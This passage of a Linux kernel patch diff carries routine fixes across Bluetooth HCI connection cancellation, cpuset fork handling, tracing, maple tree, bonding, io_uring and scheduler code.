+ 		       gfp_t flags, u32 portid, const struct nlmsghdr *nlh);
+ 
+diff --git a/include/linux/trace.h b/include/linux/trace.h
+index 80ffda8717491..2a70a447184c9 100644
+--- a/include/linux/trace.h
++++ b/include/linux/trace.h
+@@ -33,6 +33,18 @@ struct trace_array;
+ int register_ftrace_export(struct trace_export *export);
+ int unregister_ftrace_export(struct trace_export *export);
+ 
++/**
++ * trace_array_puts - write a constant string into the trace buffer.
++ * @tr:    The trace array to write to
++ * @str:   The constant string to write
++ */
++#define trace_array_puts(tr, str)					\
++	({								\
++		str ? __trace_array_puts(tr, _THIS_IP_, str, strlen(str)) : -1;	\
++	})
++int __trace_array_puts(struct trace_array *tr, unsigned long ip,
++		       const char *str, int size);
++
+ void trace_printk_init_buffers(void);
+ __printf(3, 4)
+ int trace_array_printk(struct trace_array *tr, unsigned long ip,
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 7254edfba4c9c..ffb89b98b2714 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -954,6 +954,7 @@ enum {
+ 	HCI_CONN_STK_ENCRYPT,
+ 	HCI_CONN_AUTH_INITIATOR,
+ 	HCI_CONN_DROP,
++	HCI_CONN_CANCEL,
+ 	HCI_CONN_PARAM_REMOVAL_PEND,
+ 	HCI_CONN_NEW_LINK_KEY,
+ 	HCI_CONN_SCANNING,
+diff --git a/include/net/bonding.h b/include/net/bonding.h
+index ea36ab7f9e724..c3843239517d5 100644
+--- a/include/net/bonding.h
++++ b/include/net/bonding.h
+@@ -761,13 +761,17 @@ static inline int bond_get_targets_ip(__be32 *targets, __be32 ip)
+ #if IS_ENABLED(CONFIG_IPV6)
+ static inline int bond_get_targets_ip6(struct in6_addr *targets, struct in6_addr *ip)
+ {
++	struct in6_addr mcaddr;
+ 	int i;
+ 
+-	for (i = 0; i < BOND_MAX_NS_TARGETS; i++)
+-		if (ipv6_addr_equal(&targets[i], ip))
++	for (i = 0; i < BOND_MAX_NS_TARGETS; i++) {
++		addrconf_addr_solict_mult(&targets[i], &mcaddr);
++		if ((ipv6_addr_equal(&targets[i], ip)) ||
++		    (ipv6_addr_equal(&mcaddr, ip)))
+ 			return i;
+ 		else if (ipv6_addr_any(&targets[i]))
+ 			break;
++	}
+ 
+ 	return -1;
+ }
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index add5cff7952c5..14d4fa6468417 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -962,7 +962,7 @@ static void __io_req_complete_post(struct io_kiocb *req)
+ 
+ void io_req_complete_post(struct io_kiocb *req, unsigned issue_flags)
+ {
+-	if (req->ctx->task_complete && (issue_flags & IO_URING_F_IOWQ)) {
++	if (req->ctx->task_complete && req->ctx->submitter_task != current) {
+ 		req->io_task_work.func = io_req_task_complete;
+ 		io_req_task_work_add(req);
+ 	} else if (!(issue_flags & IO_URING_F_UNLOCKED) ||
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index ca826bd1eba33..e89af77e74255 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -1513,7 +1513,7 @@ static int update_parent_subparts_cpumask(struct cpuset *cs, int cmd,
+ 	spin_unlock_irq(&callback_lock);
+ 
+ 	if (adding || deleting)
+-		update_tasks_cpumask(parent, tmp->new_cpus);
++		update_tasks_cpumask(parent, tmp->addmask);
+ 
+ 	/*
+ 	 * Set or clear CS_SCHED_LOAD_BALANCE when partcmd_update, if necessary.
+@@ -1770,10 +1770,13 @@ static int update_cpumask(struct cpuset *cs, struct cpuset *trialcs,
+ 	/*
+ 	 * Use the cpumasks in trialcs for tmpmasks when they are pointers
+ 	 * to allocated cpumasks.
++	 *
++	 * Note that update_parent_subparts_cpumask() uses only addmask &
++	 * delmask, but not new_cpus.
+ 	 */
+ 	tmp.addmask  = trialcs->subparts_cpus;
+ 	tmp.delmask  = trialcs->effective_cpus;
+-	tmp.new_cpus = trialcs->cpus_allowed;
++	tmp.new_cpus = NULL;
+ #endif
+ 
+ 	retval = validate_change(cs, trialcs);
+@@ -1838,6 +1841,11 @@ static int update_cpumask(struct cpuset *cs, struct cpuset *trialcs,
+ 	}
+ 	spin_unlock_irq(&callback_lock);
+ 
++#ifdef CONFIG_CPUMASK_OFFSTACK
++	/* Now trialcs->cpus_allowed is available */
++	tmp.new_cpus = trialcs->cpus_allowed;
++#endif
++
+ 	/* effective_cpus will be updated here */
+ 	update_cpumasks_hier(cs, &tmp, false);
+ 
+@@ -2445,6 +2453,20 @@ static int fmeter_getrate(struct fmeter *fmp)
+ 
+ static struct cpuset *cpuset_attach_old_cs;
+ 
++/*
++ * Check to see if a cpuset can accept a new task
++ * For v1, cpus_allowed and mems_allowed can't be empty.
++ * For v2, effective_cpus can't be empty.
++ * Note that in v1, effective_cpus = cpus_allowed.
++ */
++static int cpuset_can_attach_check(struct cpuset *cs)
++{
++	if (cpumask_empty(cs->effective_cpus) ||
++	   (!is_in_v2_mode() && nodes_empty(cs->mems_allowed)))
++		return -ENOSPC;
++	return 0;
++}
++
+ /* Called by cgroups to determine if a cpuset is usable; cpuset_rwsem held */
+ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ {
+@@ -2459,16 +2481,9 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ 
+ 	percpu_down_write(&cpuset_rwsem);
+ 
+-	/* allow moving tasks into an empty cpuset if on default hierarchy */
+-	ret = -ENOSPC;
+-	if (!is_in_v2_mode() &&
+-	    (cpumask_empty(cs->cpus_allowed) || nodes_empty(cs->mems_allowed)))
+-		goto out_unlock;
+-
+-	/*
+-	 * Task cannot be moved to a cpuset with empty effective cpus.
+-	 */
+-	if (cpumask_empty(cs->effective_cpus))
++	/* Check to see if task is allowed in the cpuset */
++	ret = cpuset_can_attach_check(cs);
++	if (ret)
+ 		goto out_unlock;
+ 
+ 	cgroup_taskset_for_each(task, css, tset) {
+@@ -2485,7 +2500,6 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ 	 * changes which zero cpus/mems_allowed.
+ 	 */
+ 	cs->attach_in_progress++;
+-	ret = 0;
+ out_unlock:
+ 	percpu_up_write(&cpuset_rwsem);
+ 	return ret;
+@@ -2494,25 +2508,46 @@ out_unlock:
+ static void cpuset_cancel_attach(struct cgroup_taskset *tset)
+ {
+ 	struct cgroup_subsys_state *css;
++	struct cpuset *cs;
+ 
+ 	cgroup_taskset_first(tset, &css);
++	cs = css_cs(css);
+ 
+ 	percpu_down_write(&cpuset_rwsem);
+-	css_cs(css)->attach_in_progress--;
++	cs->attach_in_progress--;
++	if (!cs->attach_in_progress)
++		wake_up(&cpuset_attach_wq);
+ 	percpu_up_write(&cpuset_rwsem);
+ }
+ 
+ /*
+- * Protected by cpuset_rwsem.  cpus_attach is used only by cpuset_attach()
++ * Protected by cpuset_rwsem. cpus_attach is used only by cpuset_attach_task()
+  * but we can't allocate it dynamically there.  Define it global and
+  * allocate from cpuset_init().
+  */
+ static cpumask_var_t cpus_attach;
++static nodemask_t cpuset_attach_nodemask_to;
++
++static void cpuset_attach_task(struct cpuset *cs, struct task_struct *task)
++{
++	percpu_rwsem_assert_held(&cpuset_rwsem);
++
++	if (cs != &top_cpuset)
++		guarantee_online_cpus(task, cpus_attach);
++	else
++		cpumask_copy(cpus_attach, task_cpu_possible_mask(task));
++	/*
++	 * can_attach beforehand should guarantee that this doesn't
++	 * fail.  TODO: have a better way to handle failure here
++	 */
++	WARN_ON_ONCE(set_cpus_allowed_ptr(task, cpus_attach));
++
++	cpuset_change_task_nodemask(task, &cpuset_attach_nodemask_to);
++	cpuset_update_task_spread_flags(cs, task);
++}
+ 
+ static void cpuset_attach(struct cgroup_taskset *tset)
+ {
+-	/* static buf protected by cpuset_rwsem */
+-	static nodemask_t cpuset_attach_nodemask_to;
+ 	struct task_struct *task;
+ 	struct task_struct *leader;
+ 	struct cgroup_subsys_state *css;
+@@ -2543,20 +2578,8 @@ static void cpuset_attach(struct cgroup_taskset *tset)
+ 
+ 	guarantee_online_mems(cs, &cpuset_attach_nodemask_to);
+ 
+-	cgroup_taskset_for_each(task, css, tset) {
+-		if (cs != &top_cpuset)
+-			guarantee_online_cpus(task, cpus_attach);
+-		else
+-			cpumask_copy(cpus_attach, task_cpu_possible_mask(task));
+-		/*
+-		 * can_attach beforehand should guarantee that this doesn't
+-		 * fail.  TODO: have a better way to handle failure here
+-		 */
+-		WARN_ON_ONCE(set_cpus_allowed_ptr(task, cpus_attach));
+-
+-		cpuset_change_task_nodemask(task, &cpuset_attach_nodemask_to);
+-		cpuset_update_task_spread_flags(cs, task);
+-	}
++	cgroup_taskset_for_each(task, css, tset)
++		cpuset_attach_task(cs, task);
+ 
+ 	/*
+ 	 * Change mm for all threadgroup leaders. This is expensive and may
+@@ -3247,6 +3270,68 @@ static void cpuset_bind(struct cgroup_subsys_state *root_css)
+ 	percpu_up_write(&cpuset_rwsem);
+ }
+ 
++/*
++ * In case the child is cloned into a cpuset different from its parent,
++ * additional checks are done to see if the move is allowed.
++ */
++static int cpuset_can_fork(struct task_struct *task, struct css_set *cset)
++{
++	struct cpuset *cs = css_cs(cset->subsys[cpuset_cgrp_id]);
++	bool same_cs;
++	int ret;
++
++	rcu_read_lock();
++	same_cs = (cs == task_cs(current));
++	rcu_read_unlock();
++
++	if (same_cs)
++		return 0;
++
++	lockdep_assert_held(&cgroup_mutex);
++	percpu_down_write(&cpuset_rwsem);
++
++	/* Check to see if task is allowed in the cpuset */
++	ret = cpuset_can_attach_check(cs);
++	if (ret)
++		goto out_unlock;
++
++	ret = task_can_attach(task, cs->effective_cpus);
++	if (ret)
++		goto out_unlock;
++
++	ret = security_task_setscheduler(task);
++	if (ret)
++		goto out_unlock;
++
++	/*
++	 * Mark attach is in progress.  This makes validate_change() fail
++	 * changes which zero cpus/mems_allowed.
++	 */
++	cs->attach_in_progress++;
++out_unlock:
++	percpu_up_write(&cpuset_rwsem);
++	return ret;
++}
++
++static void cpuset_cancel_fork(struct task_struct *task, struct css_set *cset)
++{
++	struct cpuset *cs = css_cs(cset->subsys[cpuset_cgrp_id]);
++	bool same_cs;
++
++	rcu_read_lock();
++	same_cs = (cs == task_cs(current));
++	rcu_read_unlock();
++
++	if (same_cs)
++		return;
++
++	percpu_down_write(&cpuset_rwsem);
++	cs->attach_in_progress--;
++	if (!cs->attach_in_progress)
++		wake_up(&cpuset_attach_wq);
++	percpu_up_write(&cpuset_rwsem);
++}
++
+ /*
+  * Make sure the new task conform to the current state of its parent,
+  * which could have been changed by cpuset just after it inherits the
+@@ -3254,11 +3339,33 @@ static void cpuset_bind(struct cgroup_subsys_state *root_css)
+  */
+ static void cpuset_fork(struct task_struct *task)
+ {
+-	if (task_css_is_root(task, cpuset_cgrp_id))
++	struct cpuset *cs;
++	bool same_cs;
++
++	rcu_read_lock();
++	cs = task_cs(task);
++	same_cs = (cs == task_cs(current));
++	rcu_read_unlock();
++
++	if (same_cs) {
++		if (cs == &top_cpuset)
++			return;
++
++		set_cpus_allowed_ptr(task, current->cpus_ptr);
++		task->mems_allowed = current->mems_allowed;
+ 		return;
++	}
++
++	/* CLONE_INTO_CGROUP */
++	percpu_down_write(&cpuset_rwsem);
++	guarantee_online_mems(cs, &cpuset_attach_nodemask_to);
++	cpuset_attach_task(cs, task);
++
++	cs->attach_in_progress--;
++	if (!cs->attach_in_progress)
++		wake_up(&cpuset_attach_wq);
+ 
+-	set_cpus_allowed_ptr(task, current->cpus_ptr);
+-	task->mems_allowed = current->mems_allowed;
++	percpu_up_write(&cpuset_rwsem);
+ }
+ 
+ struct cgroup_subsys cpuset_cgrp_subsys = {
+@@ -3271,6 +3378,8 @@ struct cgroup_subsys cpuset_cgrp_subsys = {
+ 	.attach		= cpuset_attach,
+ 	.post_attach	= cpuset_post_attach,
+ 	.bind		= cpuset_bind,
++	.can_fork	= cpuset_can_fork,
++	.cancel_fork	= cpuset_cancel_fork,
+ 	.fork		= cpuset_fork,
+ 	.legacy_cftypes	= legacy_files,
+ 	.dfl_cftypes	= dfl_files,
+diff --git a/kernel/cgroup/legacy_freezer.c b/kernel/cgroup/legacy_freezer.c
+index 1b6b21851e9d4..936473203a6b5 100644
+--- a/kernel/cgroup/legacy_freezer.c
++++ b/kernel/cgroup/legacy_freezer.c
+@@ -22,6 +22,7 @@
+ #include <linux/freezer.h>
+ #include <linux/seq_file.h>
+ #include <linux/mutex.h>
++#include <linux/cpu.h>
+ 
+ /*
+  * A cgroup is freezing if any FREEZING flags are set.  FREEZING_SELF is
+@@ -350,7 +351,7 @@ static void freezer_apply_state(struct freezer *freezer, bool freeze,
+ 
+ 	if (freeze) {
+ 		if (!(freezer->state & CGROUP_FREEZING))
+-			static_branch_inc(&freezer_active);
++			static_branch_inc_cpuslocked(&freezer_active);
+ 		freezer->state |= state;
+ 		freeze_cgroup(freezer);
+ 	} else {
+@@ -361,7 +362,7 @@ static void freezer_apply_state(struct freezer *freezer, bool freeze,
+ 		if (!(freezer->state & CGROUP_FREEZING)) {
+ 			freezer->state &= ~CGROUP_FROZEN;
+ 			if (was_freezing)
+-				static_branch_dec(&freezer_active);
++				static_branch_dec_cpuslocked(&freezer_active);
+ 			unfreeze_cgroup(freezer);
+ 		}
+ 	}
+@@ -379,6 +380,7 @@ static void freezer_change_state(struct freezer *freezer, bool freeze)
+ {
+ 	struct cgroup_subsys_state *pos;
+ 
++	cpus_read_lock();
+ 	/*
+ 	 * Update all its descendants in pre-order traversal.  Each
+ 	 * descendant will try to inherit its parent's FREEZING state as
+@@ -407,6 +409,7 @@ static void freezer_change_state(struct freezer *freezer, bool freeze)
+ 	}
+ 	rcu_read_unlock();
+ 	mutex_unlock(&freezer_mutex);
++	cpus_read_unlock();
+ }
+ 
+ static ssize_t freezer_write(struct kernfs_open_file *of,
+diff --git a/kernel/cgroup/rstat.c b/kernel/cgroup/rstat.c
+index 793ecff290385..7006fc8dd6774 100644
+--- a/kernel/cgroup/rstat.c
++++ b/kernel/cgroup/rstat.c
+@@ -457,9 +457,7 @@ static void root_cgroup_cputime(struct cgroup_base_stat *bstat)
+ 	struct task_cputime *cputime = &bstat->cputime;
+ 	int i;
+ 
+-	cputime->stime = 0;
+-	cputime->utime = 0;
+-	cputime->sum_exec_runtime = 0;
++	memset(bstat, 0, sizeof(*bstat));
+ 	for_each_possible_cpu(i) {
+ 		struct kernel_cpustat kcpustat;
+ 		u64 *cpustat = kcpustat.cpustat;
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index e046a2bff207b..661226e38835d 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -10123,6 +10123,16 @@ static inline void calculate_imbalance(struct lb_env *env, struct sd_lb_stats *s
+ 
+ 		sds->avg_load = (sds->total_load * SCHED_CAPACITY_SCALE) /
+ 				sds->total_capacity;
++
++		/*
++		 * If the local group is more loaded than the average system
++		 * load, don't try to pull any tasks.
++		 */
++		if (local->avg_load >= sds->avg_load) {
++			env->imbalance = 0;
++			return;
++		}
++
+ 	}
+ 
+ 	/*
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 1a931896ba042..13b324f008256 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -1001,13 +1001,8 @@ __buffer_unlock_commit(struct trace_buffer *buffer, struct ring_buffer_event *ev
+ 		ring_buffer_unlock_commit(buffer);
+ }
+ 
+-/**
+- * __trace_puts - write a constant string into the trace buffer.
+- * @ip:	   The address of the caller
+- * @str:   The constant string to write
+- * @size:  The size of the string.
+- */
+-int __trace_puts(unsigned long ip, const char *str, int size)
++int __trace_array_puts(struct trace_array *tr, unsigned long ip,
++		       const char *str, int size)
+ {
+ 	struct ring_buffer_event *event;
+ 	struct trace_buffer *buffer;
+@@ -1015,7 +1010,7 @@ int __trace_puts(unsigned long ip, const char *str, int size)
+ 	unsigned int trace_ctx;
+ 	int alloc;
+ 
+-	if (!(global_trace.trace_flags & TRACE_ITER_PRINTK))
++	if (!(tr->trace_flags & TRACE_ITER_PRINTK))
+ 		return 0;
+ 
+ 	if (unlikely(tracing_selftest_running || tracing_disabled))
+@@ -1024,7 +1019,7 @@ int __trace_puts(unsigned long ip, const char *str, int size)
+ 	alloc = sizeof(*entry) + size + 2; /* possible \n added */
+ 
+ 	trace_ctx = tracing_gen_ctx();
+-	buffer = global_trace.array_buffer.buffer;
++	buffer = tr->array_buffer.buffer;
+ 	ring_buffer_nest_start(buffer);
+ 	event = __trace_buffer_lock_reserve(buffer, TRACE_PRINT, alloc,
+ 					    trace_ctx);
+@@ -1046,11 +1041,23 @@ int __trace_puts(unsigned long ip, const char *str, int size)
+ 		entry->buf[size] = '\0';
+ 
+ 	__buffer_unlock_commit(buffer, event);
+-	ftrace_trace_stack(&global_trace, buffer, trace_ctx, 4, NULL);
++	ftrace_trace_stack(tr, buffer, trace_ctx, 4, NULL);
+  out:
+ 	ring_buffer_nest_end(buffer);
+ 	return size;
+ }
++EXPORT_SYMBOL_GPL(__trace_array_puts);
++
++/**
++ * __trace_puts - write a constant string into the trace buffer.
++ * @ip:	   The address of the caller
++ * @str:   The constant string to write
++ * @size:  The size of the string.
++ */
++int __trace_puts(unsigned long ip, const char *str, int size)
++{
++	return __trace_array_puts(&global_trace, ip, str, size);
++}
+ EXPORT_SYMBOL_GPL(__trace_puts);
+ 
+ /**
+@@ -1104,22 +1111,22 @@ static void tracing_snapshot_instance_cond(struct trace_array *tr,
+ 	unsigned long flags;
+ 
+ 	if (in_nmi()) {
+-		internal_trace_puts("*** SNAPSHOT CALLED FROM NMI CONTEXT ***\n");
+-		internal_trace_puts("*** snapshot is being ignored        ***\n");
++		trace_array_puts(tr, "*** SNAPSHOT CALLED FROM NMI CONTEXT ***\n");
++		trace_array_puts(tr, "*** snapshot is being ignored        ***\n");
+ 		return;
+ 	}
+ 
+ 	if (!tr->allocated_snapshot) {
+-		internal_trace_puts("*** SNAPSHOT NOT ALLOCATED ***\n");
+-		internal_trace_puts("*** stopping trace here!   ***\n");
+-		tracing_off();
++		trace_array_puts(tr, "*** SNAPSHOT NOT ALLOCATED ***\n");
++		trace_array_puts(tr, "*** stopping trace here!   ***\n");
++		tracer_tracing_off(tr);
+ 		return;
+ 	}
+ 
+ 	/* Note, snapshot can not be used when the tracer uses it */
+ 	if (tracer->use_max_tr) {
+-		internal_trace_puts("*** LATENCY TRACER ACTIVE ***\n");
+-		internal_trace_puts("*** Can not use snapshot (sorry) ***\n");
++		trace_array_puts(tr, "*** LATENCY TRACER ACTIVE ***\n");
++		trace_array_puts(tr, "*** Can not use snapshot (sorry) ***\n");
+ 		return;
+ 	}
+ 
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index fb452873914f2..022573f499578 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -178,7 +178,7 @@ static void mt_free_rcu(struct rcu_head *head)
+  */
+ static void ma_free_rcu(struct maple_node *node)
+ {
+-	node->parent = ma_parent_ptr(node);
++	WARN_ON(node->parent != ma_parent_ptr(node));
+ 	call_rcu(&node->rcu, mt_free_rcu);
+ }
+ 
+@@ -1785,8 +1785,10 @@ static inline void mas_replace(struct ma_state *mas, bool advanced)
+ 		rcu_assign_pointer(slots[offset], mas->node);
+ 	}
+ 
+-	if (!advanced)
++	if (!advanced) {
++		mte_set_node_dead(old_enode);
+ 		mas_free(mas, old_enode);
++	}
+ }
+ 
+ /*
+@@ -4221,6 +4223,7 @@ static inline bool mas_wr_node_store(struct ma_wr_state *wr_mas)
+ done:
+ 	mas_leaf_set_meta(mas, newnode, dst_pivots, maple_leaf_64, new_end);
+ 	if (in_rcu) {
++		mte_set_node_dead(mas->node);
+ 		mas->node = mt_mk_node(newnode, wr_mas->type);
+ 		mas_replace(mas, false);
+ 	} else {
+diff --git a/net/9p/trans_xen.c b/net/9p/trans_xen.c
+index c64050e839ac6..1fffe2bed5b02 100644
+--- a/net/9p/trans_xen.c
++++ b/net/9p/trans_xen.c
+@@ -280,6 +280,10 @@ static void xen_9pfs_front_free(struct xen_9pfs_front_priv *priv)
+ 	write_unlock(&xen_9pfs_lock);
+ 
+ 	for (i = 0; i < priv->num_rings; i++) {
++		struct xen_9pfs_dataring *ring = &priv->rings[i];
++
++		cancel_work_sync(&ring->work);
++
+ 		if (!priv->rings[i].intf)
+ 			break;
+ 		if (priv->rings[i].irq > 0)
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 61a34801e61ea..bd38e36e5a58a 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -68,7 +68,7 @@ static const struct sco_param esco_param_msbc[] = {
+ };
+ 
+ /* This function requires the caller holds hdev->lock */
+-static void hci_connect_le_scan_cleanup(struct hci_conn *conn)
++static void hci_connect_le_scan_cleanup(struct hci_conn *conn, u8 status)
+ {
+ 	struct hci_conn_params *params;
+ 	struct hci_dev *hdev = conn->hdev;
+@@ -88,9 +88,28 @@ static void hci_connect_le_scan_cleanup(struct hci_conn *conn)
+ 
+ 	params = hci_pend_le_action_lookup(&hdev->pend_le_conns, bdaddr,
+ 					   bdaddr_type);
+-	if (!params || !params->explicit_connect)
++	if (!params)
+ 		return;
+ 
++	if (params->conn) {
++		hci_conn_drop(params->conn);
++		hci_conn_put(params->conn);
++		params->conn = NULL;
++	}
++
++	if (!params->explicit_connect)
++		return;
++
++	/* If the status indicates successful cancellation of
++	 * the attempt (i.e. Unknown Connection Id) there's no point of
++	 * notifying failure since we'll go back to keep trying to
++	 * connect. The only exception is explicit connect requests
++	 * where a timeout + cancel does indicate an actual failure.
++	 */
++	if (status && status != HCI_ERROR_UNKNOWN_CONN_ID)
++		mgmt_connect_failed(hdev, &conn->dst, conn->type,
++				    conn->dst_type, status);
++
+ 	/* The connection attempt was doing scan for new RPA, and is
+ 	 * in scan phase. If params are not associated with any other
+ 	 * autoconnect action, remove them completely. If they are, just unmark
+@@ -178,7 +197,7 @@ static void le_scan_cleanup(struct work_struct *work)
+ 	rcu_read_unlock();
+ 
+ 	if (c == conn) {
+-		hci_connect_le_scan_cleanup(conn);
++		hci_connect_le_scan_cleanup(conn, 0x00);
+ 		hci_conn_cleanup(conn);
+ 	}
+ 
+@@ -1049,6 +1068,17 @@ struct hci_conn *hci_conn_add(struct hci_dev *hdev, int type, bdaddr_t *dst,
+ 	return conn;
+ }
+ 
++static bool hci_conn_unlink(struct hci_conn *conn)
++{
++	if (!conn->link)
++		return false;
++
++	conn->link->link = NULL;
++	conn->link = NULL;
++
++	return true;
++}
++
+ int hci_conn_del(struct hci_conn *conn)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+@@ -1060,9 +1090,17 @@ int hci_conn_del(struct hci_conn *conn)
+ 	cancel_delayed_work_sync(&conn->idle_work);
+ 
+ 	if (conn->type == ACL_LINK) {
+-		struct hci_conn *sco = conn->link;
+-		if (sco)
+-			sco->link = NULL;
++		struct hci_conn *link = conn->link;
++
++		if (link) {
++			hci_conn_unlink(conn);
++			/* Due to race, SCO connection might be not established
++			 * yet at this point. Delete it now, otherwise it is
++			 * possible for it to be stuck and can't be deleted.
++			 */
++			if (link->handle == HCI_CONN_HANDLE_UNSET)
++				hci_conn_del(link);
++		}
+ 
+ 		/* Unacked frames */
+ 		hdev->acl_cnt += conn->sent;
+@@ -1077,7 +1115,7 @@ int hci_conn_del(struct hci_conn *conn)
+ 		struct hci_conn *acl = conn->link;
+ 
+ 		if (acl) {
+-			acl->link = NULL;
++			hci_conn_unlink(conn);
+ 			hci_conn_drop(acl);
+ 		}
+ 
+@@ -1172,31 +1210,8 @@ EXPORT_SYMBOL(hci_get_route);
+ static void hci_le_conn_failed(struct hci_conn *conn, u8 status)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+-	struct hci_conn_params *params;
+-
+-	params = hci_pend_le_action_lookup(&hdev->pend_le_conns, &conn->dst,
+-					   conn->dst_type);
+-	if (params && params->conn) {
+-		hci_conn_drop(params->conn);
+-		hci_conn_put(params->conn);
+-		params->conn = NULL;
+-	}
+-
+-	/* If the status indicates successful cancellation of
+-	 * the attempt (i.e. Unknown Connection Id) there's no point of
+-	 * notifying failure since we'll go back to keep trying to
+-	 * connect. The only exception is explicit connect requests
+-	 * where a timeout + cancel does indicate an actual failure.
+-	 */
+-	if (status != HCI_ERROR_UNKNOWN_CONN_ID ||
+-	    (params && params->explicit_connect))
+-		mgmt_connect_failed(hdev, &conn->dst, conn->type,
+-				    conn->dst_type, status);
+ 
+-	/* Since we may have temporarily stopped the background scanning in
+-	 * favor of connection establishment, we should restart it.
+-	 */
+-	hci_update_passive_scan(hdev);
++	hci_connect_le_scan_cleanup(conn, status);
+ 
+ 	/* Enable advertising in case this was a failed connection
+ 	 * attempt as a peripheral.
+@@ -1230,15 +1245,15 @@ static void create_le_conn_complete(struct hci_dev *hdev, void *data, int err)
+ {
+ 	struct hci_conn *conn = data;
+ 
++	bt_dev_dbg(hdev, "err %d", err);
++
+ 	hci_dev_lock(hdev);
+ 
+ 	if (!err) {
+-		hci_connect_le_scan_cleanup(conn);
++		hci_connect_le_scan_cleanup(conn, 0x00);
+ 		goto done;
+ 	}
+ 
+-	bt_dev_err(hdev, "request failed to create LE connection: err %d", err);
+-
+ 	/* Check if connection is still pending */
+ 	if (conn != hci_lookup_le_connect(hdev))
+ 		goto done;
+@@ -2429,6 +2444,12 @@ void hci_conn_hash_flush(struct hci_dev *hdev)
+ 		c->state = BT_CLOSED;
+ 
+ 		hci_disconn_cfm(c, HCI_ERROR_LOCAL_HOST_TERM);
++
++		/* Unlink before deleting otherwise it is possible that
++		 * hci_conn_del removes the link which may cause the list to
++		 * contain items already freed.
++		 */
++		hci_conn_unlink(c);
+ 		hci_conn_del(c);
+ 	}
+ }
+@@ -2766,6 +2787,9 @@ int hci_abort_conn(struct hci_conn *conn, u8 reason)
+ {
+ 	int r = 0;
+ 
++	if (test_and_set_bit(HCI_CONN_CANCEL, &conn->flags))
++		return 0;
++
+ 	switch (conn->state) {
+ 	case BT_CONNECTED:
+ 	case BT_CONFIG:
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index ad92a4be58517..e87c928c9e17a 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -2881,16 +2881,6 @@ static void cs_le_create_conn(struct hci_dev *hdev, bdaddr_t *peer_addr,
+ 
+ 	conn->resp_addr_type = peer_addr_type;
+ 	bacpy(&conn->resp_addr, peer_addr);
+-
+-	/* We don't want the connection attempt to stick around
+-	 * indefinitely since LE doesn't have a page timeout concept
+-	 * like BR/EDR. Set a timer for any connection that doesn't use
+-	 * the accept list for connecting.
+-	 */
+-	if (filter_policy == HCI_LE_USE_PEER_ADDR)
+-		queue_delayed_work(conn->hdev->workqueue,
+-				   &conn->le_conn_timeout,
+-				   conn->conn_timeout);
+ }
+ 
+ static void hci_cs_le_create_conn(struct hci_dev *hdev, u8 status)
+@@ -5902,6 +5892,12 @@ static void le_conn_complete_evt(struct hci_dev *hdev, u8 status,
+ 	if (status)
+ 		goto unlock;
+ 
++	/* Drop the connection if it has been aborted */
++	if (test_bit(HCI_CONN_CANCEL, &conn->flags)) {
++		hci_conn_drop(conn);
++		goto unlock;
++	}
++
+ 	if (conn->dst_type == ADDR_LE_DEV_PUBLIC)
+ 		addr_type = BDADDR_LE_PUBLIC;
+ 	else
+@@ -6995,7 +6991,7 @@ static void hci_le_big_sync_established_evt(struct hci_dev *hdev, void *data,
+ 		bis->iso_qos.in.latency = le16_to_cpu(ev->interval) * 125 / 100;
+ 		bis->iso_qos.in.sdu = le16_to_cpu(ev->max_pdu);
+ 
+-		hci_connect_cfm(bis, ev->status);
++		hci_iso_setup_path(bis);
+ 	}
+ 
+ 	hci_dev_unlock(hdev);
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 5a6aa1627791b..632be12672887 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -246,8 +246,9 @@ int __hci_cmd_sync_status_sk(struct hci_dev *hdev, u16 opcode, u32 plen,
+ 
+ 	skb = __hci_cmd_sync_sk(hdev, opcode, plen, param, event, timeout, sk);
+ 	if (IS_ERR(skb)) {
+-		bt_dev_err(hdev, "Opcode 0x%4x failed: %ld", opcode,
+-				PTR_ERR(skb));
++		if (!event)
++			bt_dev_err(hdev, "Opcode 0x%4x failed: %ld", opcode,
++				   PTR_ERR(skb));
+ 		return PTR_ERR(skb);
+ 	}
+ 
+@@ -5126,8 +5127,11 @@ static int hci_le_connect_cancel_sync(struct hci_dev *hdev,
+ 	if (test_bit(HCI_CONN_SCANNING, &conn->flags))
+ 		return 0;
+ 
++	if (test_and_set_bit(HCI_CONN_CANCEL, &conn->flags))
++		return 0;
++
+ 	return __hci_cmd_sync_status(hdev, HCI_OP_LE_CREATE_CONN_CANCEL,
+-				     6, &conn->dst, HCI_CMD_TIMEOUT);
++				     0, NULL, HCI_CMD_TIMEOUT);
+ }
+ 
+ static int hci_connect_cancel_sync(struct hci_dev *hdev, struct hci_conn *conn)
+@@ -6102,6 +6106,9 @@ int hci_le_create_conn_sync(struct hci_dev *hdev, struct hci_conn *conn)
+ 				       conn->conn_timeout, NULL);
+ 
+ done:
++	if (err == -ETIMEDOUT)
++		hci_le_connect_cancel_sync(hdev, conn);
++
+ 	/* Re-enable advertising after the connection attempt is finished. */
+ 	hci_resume_advertising_sync(hdev);
+ 	return err;
+diff --git a/net/bluetooth/hidp/core.c b/net/bluetooth/hidp/core.c
